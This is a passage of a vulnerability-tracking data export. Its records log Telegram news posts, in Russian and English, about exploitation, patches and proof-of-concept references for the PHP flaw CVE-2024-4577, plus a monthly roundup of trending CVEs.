\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0438\u0437 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435\u0439 \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432, \u0441\u043e\u0446\u0441\u0435\u0442\u0435\u0439, \u0431\u043b\u043e\u0433\u043e\u0432, \u0422\u0413-\u043a\u0430\u043d\u0430\u043b\u043e\u0432, \u0431\u0430\u0437 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0445 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0435\u0432 \u043a\u043e\u0434\u0430, \u0432\u044b\u0434\u0435\u043b\u0438\u0432 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u044e\u043d\u044f.\n\n\u041f\u043e \u0441\u0443\u0442\u0438 \u044d\u0442\u043e \u0441\u0430\u043c\u044b\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043b\u0438\u0431\u043e \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e, \u043b\u0438\u0431\u043e \u043c\u043e\u0433\u0443\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u0435 \u0432\u0440\u0435\u043c\u044f.\n\n\u0412 \u044d\u0442\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435 \u0442\u0430\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043c\u043d\u043e\u0433\u043e \u2014 \u0434\u0435\u0432\u044f\u0442\u044c:\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Microsoft Windows, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439: \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 CSC (CVE-2024-26229), \u0441\u043b\u0443\u0436\u0431\u0435 Error Reporting (CVE-2024-26169) \u0438 \u044f\u0434\u0440\u0435 \u041e\u0421 (CVE-2024-30088);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432\u043e\u043c \u044f\u0437\u044b\u043a\u0435 PHP \u043d\u0430 \u0443\u0437\u043b\u0430\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows (CVE-2024-4577);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0432 \u044f\u0434\u0440\u0435 Linux (CVE-2024-1086);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u0432 Check Point Quantum Security Gateways (CVE-2024-24919);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 VMware vCenter, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 (CVE-2024-37079, CVE-2024-37080);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Veeam Backup & Replication, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (CVE-2024-29849).\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043f\u043e \u043a\u0430\u0436\u0434\u043e\u0439 \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432, \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438 \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u043c\u0435\u0440 - \u0432 \u0431\u043b\u043e\u0433\u0435\u00a0Positive Technologies.", "creation_timestamp": "2024-07-11T18:50:01.000000Z"}, {"uuid": "6c4e1204-aeb3-4646-b2a0-a6cb8a0c32d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/ctinow/232030", "content": "Experts warn of mass exploitation of critical PHP flaw CVE-2024-4577\nhttps://ift.tt/CsQPuYS", "creation_timestamp": "2025-03-10T16:18:14.000000Z"}, {"uuid": "ca195fa5-c1b2-4168-bcd8-640ff98ee748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/ctinow/220082", "content": "Multiple threat actors exploit PHP flaw CVE-2024-4577 to deliver malware\nhttps://ift.tt/qoIXNbF", "creation_timestamp": "2024-07-11T16:49:34.000000Z"}, {"uuid": "52b5a02f-0e87-4338-a3e8-c5f227e1b8eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/ctinow/218677", "content": "TellYouThePass Ransomware Attack Detection: Hackers Exploit CVE-2024-4577 to Install Web Shells and Drop Malware\u00a0\nhttps://ift.tt/YGH2sXl", "creation_timestamp": "2024-06-13T15:14:11.000000Z"}, {"uuid": "2afc558c-1182-4179-b2f4-05b3859ddeb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/tU2jmdbw4RGZTBUbD4dAUWYmR23KETwFYGSN5xZtWnjEejM", "content": "", "creation_timestamp": "2026-04-29T09:00:05.000000Z"}, {"uuid": "8d0c07bd-105f-4a02-8b1a-6badc37efc14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3662", "content": "https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/", "creation_timestamp": "2024-06-07T20:29:14.000000Z"}, {"uuid": "885054f0-abf9-4b5e-83d4-017bbb844b54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/information_security_channel/52349", "content": "PHP Patches Critical Remote Code Execution Vulnerability\nhttps://www.securityweek.com/php-patches-critical-remote-code-execution-vulnerability/\n\nPHP has released patches for CVE-2024-4577, a critical vulnerability that could lead to arbitrary code execution on remote servers.\nThe post PHP Patches Critical Remote Code Execution Vulnerability (https://www.securityweek.com/php-patches-critical-remote-code-execution-vulnerability/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-06-10T15:40:40.000000Z"}, {"uuid": "8ff2b76a-be09-4655-a9c3-4309a4457052", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/thehackernews/6521", "content": "\ud83d\udea8 Severe PHP Flaw Under Attack.\n\nHackers are exploiting CVE-2024-4577 to deploy crypto miners \u26cf\ufe0f & Quasar RAT on Windows servers.\n\n\ud83d\udd39 54% of attacks target Taiwan\n\ud83d\udd39 5% deploy XMRig miner\n\ud83d\udd39 PHP CGI mode at risk\n\nPatch NOW before your servers become a battleground.\n\n\ud83d\udd17 Learn more: https://thehackernews.com/2025/03/hackers-exploit-severe-php-flaw-to.html", "creation_timestamp": "2025-03-19T17:06:19.000000Z"}, {"uuid": "99e546ac-b9b4-4889-9edd-8791f70cb787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/thehackernews/5086", "content": "\ud83d\uded1 Attention Developers and SysAdmins! \n \nA new PHP flaw (CVE-2024-4577) affects all of its Windows versions, enabling remote code execution via CGI argument injection. \n \nLearn more: https://thehackernews.com/2024/06/new-php-vulnerability-exposes-windows.html \n \nPatch is available\u2014update to PHP 8.3.8, 8.2.20, or 8.1.29 immediately.", "creation_timestamp": "2024-06-08T09:38:03.000000Z"}, {"uuid": "c4a7c74f-8832-41d3-8a7d-c8f5954a629b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/thehackernews/5238", "content": "A recently disclosed security flaw in PHP (CVE-2024-4577) is being exploited by multiple threat actors to deploy remote access trojans, cryptocurrency miners, and DDoS botnets. \n \nLearn more https://thehackernews.com/2024/07/php-vulnerability-exploited-to-spread.html", "creation_timestamp": "2024-07-11T07:23:27.000000Z"}, {"uuid": "81d310ac-b63e-449b-8b57-170aac78e98c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/thehackernews/5441", "content": "Msupedge, a new backdoor exploiting PHP vulnerability CVE-2024-4577, was discovered in a cyber attack on a Taiwanese university. It uses DNS tunneling, making it hard to detect and posing a serious threat to organizations.\n\nhttps://thehackernews.com/2024/08/hackers-exploit-php-vulnerability-to.html", "creation_timestamp": "2024-08-20T12:41:06.000000Z"}, {"uuid": "8ceef6c2-4993-4487-aaef-c6490ef67282", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/thehackernews/6453", "content": "\ud83d\udea8 Cybercriminals are exploiting CVE-2024-4577, a critical PHP flaw, to gain remote access to systems in Japan.\n\nAfter entry, they use tools like JuicyPotato to escalate privileges and move laterally.\n\nThis multi-step attack leads to full system control, disrupting key business operations.\n\nLearn more: https://thehackernews.com/2025/03/php-cgi-rce-flaw-exploited-in-attacks.html", "creation_timestamp": "2025-03-07T05:57:19.000000Z"}, {"uuid": "46ffb72d-cd2b-4291-8aa5-82696b08cbdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/xakep_ru/16303", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 Msupedge\n\n\u0418\u0411-\u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b\u0438 \u0432 Windows-\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0438\u0442\u0435\u0442\u043e\u0432 \u0422\u0430\u0439\u0432\u0430\u043d\u044f \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Msupedge. \u0414\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP (CVE-2024-4577).\n\nhttps://xakep.ru/2024/08/23/msupedge/", "creation_timestamp": "2024-08-23T21:03:41.000000Z"}, {"uuid": "786e84e8-43a3-4396-a09f-64a51c25d8bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/xakep_ru/17220", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP-CGI \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u044f\u043f\u043e\u043d\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 GreyNoise \u0438 Cisco Talos \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-4577 \u0432 PHP-CGI, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0438\u044e\u043d\u044f 2024 \u0433\u043e\u0434\u0430.\n\nhttps://xakep.ru/2025/03/11/cve-2024-4577-attacks/", "creation_timestamp": "2025-03-11T18:35:10.000000Z"}, {"uuid": "6e80a227-0b86-4b54-be78-3366c45997a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/xakep_ru/16095", "content": "\u0421\u0432\u0435\u0436\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f DDoS-\u0430\u0442\u0430\u043a\n\n\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b Akamai \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0442\u0440\u043e\u044f\u043d\u043e\u0432 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043d\u044b\u0445 \u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 DDoS-\u0430\u0442\u0430\u043a.\n\nhttps://xakep.ru/2024/07/12/cve-2024-4577/", "creation_timestamp": "2024-07-12T18:35:43.000000Z"}, {"uuid": "363b79a8-ab87-4126-8b88-4b067e050e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/SecLabNews/16513", "content": "CRIME IS BAD: \u043a\u0430\u043a \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0441\u0430\u043c\u044b\u0439 \u0432\u0435\u0436\u043b\u0438\u0432\u044b\u0439 \u0434\u0435\u0444\u0435\u0439\u0441 \u0434\u0430\u0440\u043a\u043d\u0435\u0442\u0430\n\u0421\u043b\u043e\u043c\u0430\u043d\u043d\u0430\u044f \u043f\u0430\u043d\u0435\u043b\u044c, \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043b\u043e\u0433\u0438\u043d\u044b \u0438 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0430\u044f \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0441\u0442\u044c \u00ab\u043f\u0440\u043e\u0444\u0435\u0441\u0441\u0438\u043e\u043d\u0430\u043b\u043e\u0432\u00bb \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\n\n\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 LockBit \u0432\u043d\u043e\u0432\u044c \u043d\u0430 \u0441\u0446\u0435\u043d\u0435 \u2014 \u043d\u043e \u0432 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0432 \u0440\u043e\u043b\u0438 \u0436\u0435\u0440\u0442\u0432\u044b. \u041c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0438\u0445 \u0430\u0434\u043c\u0438\u043d-\u043f\u0430\u043d\u0435\u043b\u0435\u0439 \u0441 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0439 \u0443\u0442\u0435\u0447\u043a\u043e\u0439 SQL-\u0434\u0430\u043c\u043f\u0430 \u0432\u044b\u044f\u0432\u0438\u043b\u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u043b\u0430\u0431\u043e\u0441\u0442\u0438 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0431\u0430\u043d\u0434\u044b, \u043d\u043e \u0438 \u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0431\u0435\u0441\u043f\u0435\u0447\u043d\u043e\u0441\u0442\u044c \u0432 \u0431\u0430\u0437\u043e\u0432\u044b\u0445 \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u041f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0438, \u0430\u0434\u0440\u0435\u0441\u0430 \u0431\u0438\u0442\u043a\u043e\u0439\u043d-\u043a\u043e\u0448\u0435\u043b\u044c\u043a\u043e\u0432, \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u0448\u0430\u043d\u0442\u0430\u0436\u0430 \u2014 \u0432\u0441\u0451 \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435.\n\n\u041e\u0441\u043e\u0431\u043e\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u0442\u0430\u0431\u043b\u0438\u0446\u0430 chats \u2014 \u0442\u044b\u0441\u044f\u0447\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043f\u0441\u0438\u0445\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0434\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0438. \u0410 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-4577, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0435\u0439 PHP, \u043f\u043e\u0445\u043e\u0436\u0435, \u0441\u0442\u0430\u043b\u0430 \u0434\u0432\u0435\u0440\u044c\u044e \u0432 \u0442\u044b\u043b. \u042d\u0442\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442: \u0432 \u043a\u0438\u0431\u0435\u0440\u0432\u043e\u0439\u043d\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b \u0431\u044c\u044e\u0442 \u043d\u0435 \u0445\u0443\u0436\u0435 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u043e\u0432.\n\n\u0412\u0430\u0436\u043d\u043e \u0442\u043e, \u0447\u0442\u043e \u044d\u0442\u043e \u0443\u0436\u0435 \u043d\u0435 \u043f\u0435\u0440\u0432\u044b\u0439 \u0434\u0435\u0444\u0435\u0439\u0441 \u0441 \u043f\u043e\u0434\u043f\u0438\u0441\u044c\u044e \u00abCRIME IS BAD xoxo from Prague\u00bb. \u041f\u043e\u0432\u0442\u043e\u0440\u0435\u043d\u0438\u0435 \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u043d\u043e\u0441\u0442\u044c. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u043c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c \u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0433\u043e \u0442\u0438\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u2014 \u043d\u0435 \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043e\u0432 \u0438 \u043d\u0435 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431, \u0430  \u0438\u0434\u0435\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438 \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043e\u0445\u043e\u0442\u043d\u0438\u043a\u043e\u0432 \u043d\u0430 \u0434\u0430\u0440\u043a\u043d\u0435\u0442-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438.\n\n#\u0432\u0437\u043b\u043e\u043c, #\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438, #\u0434\u0430\u0440\u043a\u043d\u0435\u0442 @SecLabNews", "creation_timestamp": "2025-05-08T13:23:37.000000Z"}, {"uuid": "4fa9a8be-a67b-4807-9354-198db6b7b16d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/anti_malware/19955", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 GreyNoise \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-4577 (9.8 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e CVSS) \u0432 PHP. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 Windows-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u0441 Apache \u0438 